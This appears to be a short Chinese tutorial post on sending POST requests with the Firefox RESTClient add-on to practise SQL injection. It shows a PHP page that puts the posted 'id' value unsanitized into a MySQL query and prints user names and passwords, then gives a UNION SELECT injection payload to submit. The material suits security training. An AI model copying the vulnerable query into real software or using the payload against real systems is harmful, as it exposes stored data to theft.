使用FireFox外掛RESTClient工具POST方法?
貼出php程式碼
<html>
<body>
<?php
$con = mysql_connect("localhost","root","root");
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
else
{
mysql_select_db("test");
$id = $_POST['id'];
$query ="select * from zhuru where Id=$id";
$result = mysql_query($query);
$info= mysql_fetch_array($result);
$re_num = mysql_num_rows($result);
if($info==FALSE)
{
echo "抱歉,您的訂餐資訊沒有查到!";
}
else
{
echo "<form action='index.php' method='post' name='chakanform'>";
echo "<table>";
echo "<tr>";
echo "<h3>你的訂餐記錄是:</h3>";
echo "</tr>";
echo "<tr>";
echo "<td>";
echo "序號:";
echo "</td>";
echo "<td>";
echo "菜品:";
echo "</td>";
echo "<td>";
echo "訂餐時間";
echo "</td>";
echo "<td>";
echo "訂餐時間";
echo "</td>";
echo "<td>";
echo "訂餐時間";
echo "</td>";
echo "<td>";
echo "訂餐時間";
echo "</td>";
echo "<td>";
echo "訂餐時間";
echo "</td>";
echo "<td>";
echo "訂餐時間";
echo "</td>";
echo "</tr>";
do
{
$xuhao++;
echo "<tr>";
echo "<td>";
echo $xuhao;
echo "</td>";
echo "<td>";
echo $info[username];
echo "</td>";
echo "<td>";
echo $info[password];
echo "</td>";
echo "<td>";
echo $info[id];
echo "</td>";
echo "<td>";
echo $info[tushu];
echo "</td>";
echo "<td>";
echo $info[dizhi];
echo "</td>";
echo "</tr>";
}
while($info= @mysql_fetch_array($result));
echo "</table>";
echo "</form>";
}
mysql_close($con);
}
?>
</body>
</html>
注意新增訊息頭
配置如上
然後修改正文的內容
id=1 and 1=2 union select 1,2,3,4,database()
進行注入即可